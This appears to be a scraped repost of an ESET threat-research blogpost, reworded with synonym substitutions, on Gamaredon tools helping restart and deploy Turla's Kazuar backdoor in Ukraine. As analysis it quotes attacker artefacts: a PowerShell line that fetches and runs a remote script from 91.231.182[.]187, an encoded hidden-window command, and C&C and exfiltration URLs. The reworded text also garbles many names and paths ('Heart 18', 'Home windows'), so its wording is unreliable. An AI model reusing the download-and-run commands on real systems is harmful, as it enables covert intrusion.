{"id":6917,"date":"2025-09-22T07:25:09","date_gmt":"2025-09-22T07:25:09","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=6917"},"modified":"2025-09-22T07:25:09","modified_gmt":"2025-09-22T07:25:09","slug":"gamaredon-x-turla-collab","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=6917","title":{"rendered":"Gamaredon X Turla collab"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine.<\/p>\n<blockquote>\n<p><strong>Key factors of this blogpost:<\/strong><\/p>\n<ul>\n<li>In February 2025, we found that the Gamaredon device PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine.<\/li>\n<li>In April and June 2025, we detected that Kazuar v2 was deployed utilizing Gamaredon instruments PteroOdd and PteroPaste.<\/li>\n<li>These discoveries lead us to imagine with excessive confidence that Gamaredon is collaborating with Turla.<\/li>\n<li>Turla\u2019s sufferer depend could be very low in comparison with the variety of Gamaredon compromises, suggesting that Turla select essentially the most useful machines.<\/li>\n<li>Each teams are affiliated with the FSB, Russia\u2019s important home intelligence and safety company.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Risk actor profiles<\/h2>\n<h3>Gamaredon<\/h3>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/06\/11\/gamaredon-group-grows-its-game\/\" target=\"_blank\" rel=\"noopener\">Gamaredon<\/a> has been lively since no less than 2013. It&#8217;s accountable for many assaults, principally towards Ukrainian governmental establishments, as evidenced over time in <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.rnbo.gov.ua\/en\/Diialnist\/4824.html\" target=\"_blank\" rel=\"noopener\">a number of reviews<\/a> from <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cert.gov.ua\/article\/10702\" target=\"_blank\" rel=\"noopener\">CERT-UA<\/a> and from different official Ukrainian our bodies. Gamaredon <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\" target=\"_blank\" rel=\"noopener\">has been attributed by the Safety Service of Ukraine (SSU)<\/a> to the Heart 18 of Info Safety of the FSB, working out of occupied Crimea. We imagine this group <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/06\/18\/digging-up-invisimole-hidden-arsenal\/\" target=\"_blank\" rel=\"noopener\">to be collaborating <\/a>with one other risk actor that we found and named <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\" target=\"_blank\" rel=\"noopener\">InvisiMole<\/a>.<\/p>\n<h3>Turla<\/h3>\n<p>Turla, also referred to as Snake, is an notorious cyberespionage group that has been lively since no less than 2004, probably extending again into the late Nineteen Nineties. It&#8217;s regarded as a part of the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/interaktiv.br.de\/elite-hacker-fsb\/en\/index.html\" target=\"_blank\" rel=\"noopener\">FSB<\/a>. It primarily focuses on high-profile targets, equivalent to governments and diplomatic entities, in Europe, Central Asia, and the Center East. It&#8217;s recognized for having breached main organizations such because the US Division of Protection in 2008 and the Swiss protection firm RUAG in 2014. In the course of the previous few years, we <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2020\/05\/ESET_Turla_ComRAT.pdf\">have<\/a> <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/03\/12\/tracking-turla-new-backdoor-armenian-watering-holes\/\" target=\"_blank\" rel=\"noopener\">documented<\/a> a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2019\/05\/ESET-LightNeuron.pdf\">massive<\/a> <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2018\/08\/Eset-Turla-Outlook-Backdoor.pdf\" target=\"_blank\" rel=\"noopener\">half<\/a> of <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/wp-content\/uploads\/2018\/01\/ESET_Turla_Mosquito.pdf\" target=\"_blank\" rel=\"noopener\">Turla\u2019s<\/a> <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/2020\/12\/02\/turla-crutch-keeping-back-door-open\/\">arsenal<\/a> on the WeLiveSecurity weblog and in <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/us\/business\/services\/threat-intelligence\/\" target=\"_blank\" rel=\"noopener\">non-public reviews<\/a>.<\/p>\n<h2>Overview<\/h2>\n<p>In February 2025, by way of ESET telemetry, we detected 4 totally different Gamaredon-Turla co-compromises in Ukraine. On these machines, Gamaredon deployed a variety of instruments, together with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/white-papers\/gamaredon-in-2024.pdf\" target=\"_blank\" rel=\"noopener\">PteroLNK<\/a>, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, whereas Turla solely deployed Kazuar v3.<\/p>\n<p>On a kind of machines, we had been in a position to seize a payload displaying that Turla is ready to challenge instructions by way of Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched routinely. Thus, PteroGraphin was most likely used as a restoration technique by Turla. That is the primary time that we have now been in a position to hyperlink these two teams collectively by way of technical indicators (see <em><a rel=\"nofollow\" target=\"_blank\" href=\"#First chain: Restart of Kazuar v3\">First chain: Restart of Kazuar v3<\/a><\/em>).<\/p>\n<p>As a result of, in all 4 circumstances, the ESET endpoint product was put in after the compromises we&#8217;re unable to pinpoint the precise compromise technique. Nevertheless, Gamaredon is thought for utilizing spearphishing and malicious LNK recordsdata on detachable drives (as defined in our <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/gamaredon-2024-cranking-out-spearphishing-campaigns-ukraine-evolved-toolset\/\" target=\"_blank\" rel=\"noopener\">current blogpost<\/a>) so we presume that one among these is the most probably compromise vector.<\/p>\n<p>In April and June 2025, we detected Kazuar v2 installers being deployed straight by Gamaredon instruments (see <em><a rel=\"nofollow\" target=\"_blank\" href=\"#Second chain: Deployment of Kazuar v2 via PteroOdd\">Second chain: Deployment of Kazuar v2 by way of PteroOdd<\/a><\/em> and <em><a rel=\"nofollow\" target=\"_blank\" href=\"#Third chain: Deployment of Kazuar v2 via PteroPaste\">Third chain: Deployment of Kazuar v2 by way of PteroPaste<\/a><\/em>). This reveals that Turla is actively collaborating with Gamaredon to achieve entry to particular machines in Ukraine.<\/p>\n<h2>Victimology<\/h2>\n<p>Over the previous 18 months we have now detected Turla on seven machines in Ukraine. We imagine that Gamaredon compromised the primary 4 machines in January 2025, whereas Turla deployed Kazuar v3 in February 2025. In all circumstances, the ESET endpoint product was solely put in after each compromises.<\/p>\n<p>It&#8217;s price noting that, previous to this, the final time we detected a Turla compromise in Ukraine was in February 2024.<\/p>\n<p>All these parts, and the truth that Gamaredon is compromising tons of if not hundreds of machines, counsel that Turla is  solely in particular machines, most likely ones containing extremely delicate intelligence.<\/p>\n<h3>Attribution<\/h3>\n<h4>Gamaredon<\/h4>\n<p>In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.<\/p>\n<h4>Turla<\/h4>\n<p>Equally, for Turla, we detected the usage of Kazuar v2 and Kazuar v3, which we imagine are unique to that group.<\/p>\n<h3>Gamaredon-Turla collaboration hypotheses<\/h3>\n<p>In 2020, we confirmed that Gamaredon supplied entry to InvisiMole (see our <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/web-assets.esetstatic.com\/wls\/2020\/06\/ESET_InvisiMole.pdf\">white paper<\/a>), so it&#8217;s not the primary time that Gamaredon has collaborated with one other Russia-aligned risk actor.<\/p>\n<p>Then again, Turla is thought for hijacking different risk actors\u2019 infrastructure to get an preliminary foothold in its targets\u2019 networks. Over the previous years, a number of circumstances have been publicly documented:<\/p>\n<ul>\n<li>In 2019, Symantec printed a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.security.com\/threat-intelligence\/waterbug-espionage-governments\">blogpost<\/a> displaying that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Center Japanese goal.<\/li>\n<li>In 2023, Mandiant printed a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/turla-galaxy-opportunity\/\">blogpost<\/a> displaying that Turla reregistered expired Andromeda C&amp;C domains in an effort to compromise targets in Ukraine.<\/li>\n<li>In 2024, Microsoft printed two blogposts (<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/04\/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage\/\">first<\/a> and <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2024\/12\/11\/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine\/\">second<\/a>) displaying that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in an effort to deploy Kazuar.<\/li>\n<\/ul>\n<p>Be aware that each Gamaredon and Turla are a part of the Russian Federal Safety Service (FSB). Gamaredon is regarded as operated by officers of Heart 18 of the FSB (aka the Heart for Info Safety) in Crimea (see <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ssu.gov.ua\/en\/novyny\/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-derzhavni-orhany-ukrainy\">this report<\/a> from the Safety Service of Ukraine), which is a part of the FSB\u2019s counterintelligence service. As for Turla, the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.gov.uk\/government\/publications\/russias-fsb-malign-cyber-activity-factsheet\/russias-fsb-malign-activity-factsheet\">UK\u2019s NCSC<\/a> attributes the group to the Heart 16 of the FSB, which is Russia\u2019s important alerts intelligence (SIGINT) company.<\/p>\n<p>Due to this fact, we suggest three hypotheses to clarify our observations:<\/p>\n<ul>\n<li><strong>Very doubtless<\/strong>: Provided that each teams are a part of the Russian FSB (although in two totally different Facilities), Gamaredon supplied entry to Turla operators in order that they might challenge instructions on a selected machine to restart Kazuar, and deploy Kazuar v2 on some others.<\/li>\n<li><strong>Unlikely<\/strong>: Turla compromised Gamaredon infrastructure and leveraged this entry to recuperate entry on a machine in Ukraine. Since PteroGraphin accommodates a hardcoded token that permits modifying the C&amp;C pages, this risk can&#8217;t be absolutely discarded. Nevertheless, it implies that Turla was in a position to reproduce the total Gamaredon chain.<\/li>\n<li><strong>Unlikely<\/strong>: Gamaredon has entry to Kazuar and deploys it on very particular machines. Given Gamaredon\u2019s noisy method, we don\u2019t suppose it might be that cautious deploying Kazuar on solely a really restricted set of victims.<\/li>\n<\/ul>\n<h3>Geopolitical context<\/h3>\n<p>From an organizational perspective, it&#8217;s price noting that the 2 entities generally related to Turla and Gamaredon have a protracted historical past of reported collaboration, which may be traced again to the Chilly Conflict period.<\/p>\n<p>The FSB\u2019s Heart 16 (which is believed to harbor Turla) is <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/cepa.org\/comprehensive-reports\/russian-cyberwarfare-unpacking-the-kremlins-capabilities\/\">a direct inheritor<\/a> to the KGB\u2019s 16<sup>th<\/sup> Directorate, which was primarily accountable for international SIGINT assortment \u2013 the persistence of the quantity 16 is in truth regarded by observers as an indication of the FSB management\u2019s want to emphasise <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/checkfirst.network\/wp-content\/uploads\/2025\/07\/OSINT_Phaleristics_Unveiling_FSB_16th_Center_SIGINT_Capabilities.pdf\">a historic lineage<\/a>. Heart 18 (which is usually related to Gamaredon) maintains a tough affiliation with the KGB\u2019s 2<sup>nd<\/sup> Chief Directorate, which was accountable for inner safety throughout the Soviet Union. In the course of the Soviet period, each organizations ceaselessly labored hand in hand, sharing obligations for <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/irp.fas.org\/world\/russia\/riehle.pdf#page=239\">monitoring international embassies<\/a> on Russian soil for example.<\/p>\n<p>Then and now, such collaborations replicate the Russian strategic tradition and philosophy of a pure continuity between inner safety and nationwide protection. Though Heart 16 remains to be tasked with international intelligence assortment and Heart 18 is theoretically a part of the FSB\u2019s counterintelligence equipment, each entities appear to take care of some mission overlaps \u2013 particularly with regard to former Soviet republics. In 2018, the Safety Service of Ukraine (SBU) had already noticed Facilities 16 and 18 apparently conducting <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/go.crowdstrike.com\/rs\/281-OBQ-266\/images\/Report2019GlobalThreatReport.pdf\">a joint cyberespionage marketing campaign<\/a> (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has most likely bolstered this convergence, with ESET knowledge clearly displaying Gamaredon and Turla actions specializing in the Ukrainian protection sector in current months.<\/p>\n<p>Though the Russian intelligence neighborhood is thought for its <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ecfr.eu\/publication\/putins_hydra_inside_russias_intelligence_services\/\">fierce inner rivalries<\/a>, there are indications that such tensions mainly apply to interservice relations relatively than to intra-agency interactions. On this context, it&#8217;s maybe not solely shocking that APT teams working inside these two FSB Facilities are noticed cooperating to some extent.<\/p>\n<h2>First chain: Restart of Kazuar v3<a rel=\"nofollow\" target=\"_blank\" id=\"First chain: Restart of Kazuar v3\"\/><\/h2>\n<p>In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. On this part we element the precise chain that we detected.<\/p>\n<h3>Timeline<\/h3>\n<p>The general timeline for this machine is the next:<\/p>\n<ul>\n<li>2025-01-20: Gamaredon deployed PteroGraphin on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which may have been tampered with.<\/li>\n<li>2025-02-11: Turla deployed Kazuar v3 on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which may have been tampered with.<\/li>\n<li>2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.<\/li>\n<li>2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.<\/li>\n<li>2025-02-28 15:17:14 UTC: PteroOdd downloaded one other payload, which additionally executed Kazuar.<\/li>\n<\/ul>\n<p>Hereafter, we assume these dates to be unaltered.<\/p>\n<h3>Particulars of the occasions<\/h3>\n<p>Since January 20<sup>th<\/sup>, 2025, PteroGraphin (see Determine 1) was current on the machine at <span style=\"font-family: courier new, courier, monospace;\">%APPDATApercentx86.ps1<\/span>. It&#8217;s a downloader that gives an encrypted channel for delivering payloads by way of <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/telegra.ph\/\" target=\"_blank\" rel=\"noopener\">Telegra.ph<\/a>, an online service operated by Telegram that permits straightforward creation of internet pages. Be aware that PteroGraphin accommodates a token to edit the Telegra.ph web page, so anybody with data of this token (Turla, for instance, although unlikely) may manipulate the contents.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 1. PteroGraphin (token partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-1.jpeg\" alt=\"Figure 1. PteroGraphin (token partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Determine 1. PteroGraphin (token partially redacted)<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025, at 15:47:39 UTC, as proven in Determine 2, we detected a reply from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/SecurityHealthSystray-01-20?return_content=true<\/span>.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 2. Beautified JSON reply\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-2.png\" alt=\"Figure 2. Beautified JSON reply\" width=\"\" height=\"\"\/><figcaption><em>Determine 2. Beautified JSON reply<\/em><\/figcaption><\/figure>\n<p>The info in <span style=\"font-family: courier new, courier, monospace;\">kids<\/span> may be decrypted utilizing the hardcoded 3DES key and IV from the PteroGraphin script above, which provides:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">powershell -windowStyle hidden -EncodedCommand <base64-encoded_payload\/><\/span><\/p>\n<p>The decoded payload is one other PowerShell downloader that we named PteroOdd, proven in Determine 3.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 3. PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-3.png\" alt=\"Figure 3. PteroOdd\" width=\"\" height=\"\"\/><figcaption><em>Determine 3. PteroOdd<\/em><\/figcaption><\/figure>\n<p>On February 27<sup>th<\/sup>, 2025 at 15:47:56 UTC, we detected a request to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/dinoasjdnl-02-27?return_content=true<\/span>; the reply\u00a0is proven in Determine 4. Be aware that the replies for PteroOdd will not be encrypted.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-4.png\" alt=\"Figure 4. PteroOdd JSON reply (beautified and partially redacted)\" width=\"\" height=\"\"\/><figcaption><em>Determine 4. PteroOdd JSON reply (beautified and partially redacted)<\/em><\/figcaption><\/figure>\n<p>The decoded command is proven in Determine 5.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. Decoded PowerShell command (username redacted)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-5.png\" alt=\"Figure 5. Decoded PowerShell command (username redacted)\" width=\"\" height=\"\"\/><figcaption><em>Determine 5. Decoded PowerShell command (username redacted)<\/em><\/figcaption><\/figure>\n<p>The payload first uploads the sufferer\u2019s pc title and system drive\u2019s quantity serial quantity to the Cloudflare employee subdomain <span style=\"font-family: courier new, courier, monospace;\">https:\/\/lucky-king-96d6.mopig92456.employees[.]dev<\/span>.<\/p>\n<p>What&#8217;s most fascinating is the final line:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">Begin-Course of -FilePath &#8220;C:Customers[redacted]AppDataLocalProgramsSonyAudioDriversvncutil64.exe&#8221;<\/span><\/p>\n<p>That is the trail to the applying that&#8217;s run to execute Kazuar by side-loading it. The ESET endpoint product detected a <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-RR-01<\/span>) in reminiscence and loaded from this course of. It&#8217;s not clear to us why Turla operators had to make use of PteroGraphin to launch Kazuar, however it&#8217;s attainable that Kazuar one way or the other stopped working after the ESET product set up and that they needed to restart the implant. Be aware that we didn\u2019t see Gamaredon downloading Kazuar; it was current on the system since February 11<sup>th<\/sup>, 2025, earlier than the ESET product was put in.<\/p>\n<p>Then, on February 28<sup>th<\/sup>, 2025 at 15:17:14 UTC, we detected one other comparable PowerShell script, proven in Determine 6.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Second PowerShell command executing Kazuar\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-6.png\" alt=\"Figure 6. Second PowerShell command executing Kazuar\" width=\"\" height=\"\"\/><figcaption><em>Determine 6. Second PowerShell command executing Kazuar<\/em><\/figcaption><\/figure>\n<p>The primary strains and the Cloudflare employee subdomain are an identical. It begins the identical <span style=\"font-family: courier new, courier, monospace;\">vncutil64.exe<\/span> but additionally a second executable, <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span>, which side-loads <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperienceLOC.dll<\/span> \u2013 the Kazuar loader. We then detected in reminiscence, within the <span style=\"font-family: courier new, courier, monospace;\">LaunchGFExperience.exe<\/span> course of, one other <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payload (<span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-XX-01<\/span>). It&#8217;s not clear why two totally different <span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span> Kazuar v3 payloads had been current on the identical machine.<\/p>\n<p>Lastly, an HTTP POST request, with the checklist of operating processes, was despatched to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/put up.php<\/span>. The Turla operators most probably needed affirmation that Kazuar was efficiently launched.<\/p>\n<p>On March 10<sup>th<\/sup>, 2025 at 07:05:32 UTC, we detected one other pattern of PteroOdd, which makes use of the C&amp;C URL <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/canposgam-03-06?return_content=true<\/span>. This pattern was detected on a distinct machine in Ukraine, on which Kazuar was additionally current.<\/p>\n<p>The decoded payload is proven in Determine 7 and reveals that it additionally makes use of <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span>, whereas not interacting with any Turla pattern.<\/p>\n<p>Then again, we famous that the downloaded payload uploads the next items of data to <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/put up.php<\/span>:<\/p>\n<p>Nevertheless, we aren&#8217;t conscious of any .NET device that&#8217;s presently being utilized by Gamaredon, whereas there are a number of of them utilized by Turla, together with Kazuar. Thus, it&#8217;s attainable that these uploaded items of data are for Turla, and we assess with medium confidence that the area <span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span> is managed by Turla.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 7. PteroOdd sample\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-7.png\" alt=\"Figure 7. PteroOdd sample\" width=\"\" height=\"\"\/><figcaption><em>Determine 7. PteroOdd pattern<\/em><\/figcaption><\/figure>\n<p>The extra base64-encoded PowerShell command is a brand new downloader that abuses <span style=\"font-family: courier new, courier, monospace;\">api.gofile[.]io<\/span>; we named it PteroEffigy.<\/p>\n<h3>Kazuar v3<\/h3>\n<p>Kazuar v3 is the newest department of the Kazuar household, itself a complicated C# espionage implant that we imagine is used solely by Turla because it was first seen in 2016. Kazuar v2 and v3 are basically the identical malware household and share the identical codebase. Nevertheless, some main adjustments have been launched.<\/p>\n<p>Kazuar v3 contains round 35% extra C# strains than Kazuar v2 and introduces extra community transport strategies: over internet sockets and Trade Net Companies. Kazuar v3 can have one among three roles (<span style=\"font-family: courier new, courier, monospace;\">KERNEL<\/span>, <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">WORKER<\/span>), and malware functionalities are divided amongst these roles. For instance, solely <span style=\"font-family: courier new, courier, monospace;\">BRIDGE<\/span> communicates with the C&amp;C server.<\/p>\n<h2>Second chain: Deployment of Kazuar v2 by way of PteroOdd<a rel=\"nofollow\" target=\"_blank\" id=\"Second chain: Deployment of Kazuar v2 via PteroOdd\"\/><\/h2>\n<p>On one of many Ukrainian machines talked about within the earlier part, we detected one other fascinating compromise chain on April 18<sup>th<\/sup>, 2025.<\/p>\n<p>On April 18<sup>th<\/sup>, 2025 at 15:26:14 UTC, we detected a PteroOdd pattern (a Gamaredon device) downloading a payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/api.telegra[.]ph\/getPage\/scrsskjqwlbw-02-28?return_content=true<\/span>. The downloaded script, proven in Determine 8, is much like the payload described within the first chain, however accommodates a further base64-encoded script, which is the PowerShell downloader PteroEffigy.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 8. Payload downloaded by PteroOdd\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-8-1.png\" alt=\"Figure 8. Payload downloaded by PteroOdd (1)\" width=\"\" height=\"\"\/><figcaption><em>Determine 8. Payload downloaded by PteroOdd<\/em><\/figcaption><\/figure>\n<p>This PowerShell payload downloads one other payload from <span style=\"font-family: courier new, courier, monospace;\">https:\/\/eset.ydns[.]eu\/scrss.ps1<\/span> and executes it.<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> turned out to be an installer for Turla\u2019s Kazuar v2, which was beforehand analyzed intimately by <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/unit42.paloaltonetworks.com\/pensive-ursa-uses-upgraded-kazuar-backdoor\/\" target=\"_blank\" rel=\"noopener\">Unit42<\/a>. This reveals that Gamaredon deployed Kazuar, most probably on behalf of Turla.<\/p>\n<p>The Kazuar <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> is <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> and the three C&amp;C servers are:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/pictures\/media\/bar\/index.php<\/span><\/li>\n<\/ul>\n<p>It&#8217;s price noting that Turla retains utilizing compromised WordPress servers as C&amp;Cs for Kazuar.<\/p>\n<p>Curiously, it appears that evidently Kazuar v2 remains to be maintained in parallel to Kazuar v3. For instance, the current updates to the backdoor instructions in Kazuar v3 are additionally included on this <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-26<\/span> model.<\/p>\n<h2>Third chain: Deployment of Kazuar v2 by way of PteroPaste<a rel=\"nofollow\" target=\"_blank\" id=\"Third chain: Deployment of Kazuar v2 via PteroPaste\"\/><\/h2>\n<p>On June 5<sup>th<\/sup> and 6<sup>th<\/sup>, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In each circumstances, Gamaredon\u2019s PteroPaste was caught attempting to execute the straightforward PowerShell script proven in Determine 9.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 9. PowerShell script executed by PteroPaste\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gamaredon-x-turla\/figure-9-1.png\" alt=\"Figure 9. PowerShell script executed by PteroPaste (1)\" width=\"\" height=\"\"\/><figcaption><em>Determine 9. PowerShell script executed by PteroPaste<\/em><\/figcaption><\/figure>\n<p>The base64-encoded string is the next downloader in PowerShell:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Web.WebClient).downloadString(&#8216;https:\/\/91.231.182[.]187\/ekrn.ps1&#8217;);<\/span><\/p>\n<p>The downloaded script <span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span> is similar to <span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span> talked about within the second chain. This additionally drops and installs Kazuar v2.<\/p>\n<p>Each samples have an <span style=\"font-family: courier new, courier, monospace;\">agent_label<\/span> of <span style=\"font-family: courier new, courier, monospace;\">AGN-AB-27<\/span> and the C&amp;C servers are the identical as these within the pattern from the second chain:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/pictures\/media\/bar\/index.php<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: courier new, courier, monospace;\">ekrn.exe<\/span> is a respectable technique of ESET endpoint safety merchandise. Thus, Turla most likely tried to masquerade because it in an effort to fly beneath the radar. Additionally notice that <span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span> resolves to <span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span>.<\/p>\n<p>Lastly, we additionally discovered on <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.virustotal.com\/gui\/file\/3ecb09e659bcb500f9f40d022579a09acb11aec3a92c03e7d3fd2e56982d9eea\" target=\"_blank\" rel=\"noopener\">VirusTotal<\/a> a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5<sup>th<\/sup>, 2025. This implies that Turla is thinking about targets exterior of Ukraine as nicely.<\/p>\n<h2>Conclusion<\/h2>\n<p>On this blogpost, we have now proven how Turla was in a position to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in an effort to restart Kazuar v3 and deploy Kazuar v2 on a number of machines in Ukraine. We now imagine with excessive confidence that each teams \u2013 individually related to the FSB \u2013 are cooperating and that Gamaredon is offering preliminary entry to Turla.<\/p>\n<blockquote>\n<div><em>For any inquiries about our analysis printed on WeLiveSecurity, please contact us at <a rel=\"nofollow\" target=\"_blank\" style=\"background-color: #f4f4f4;\" 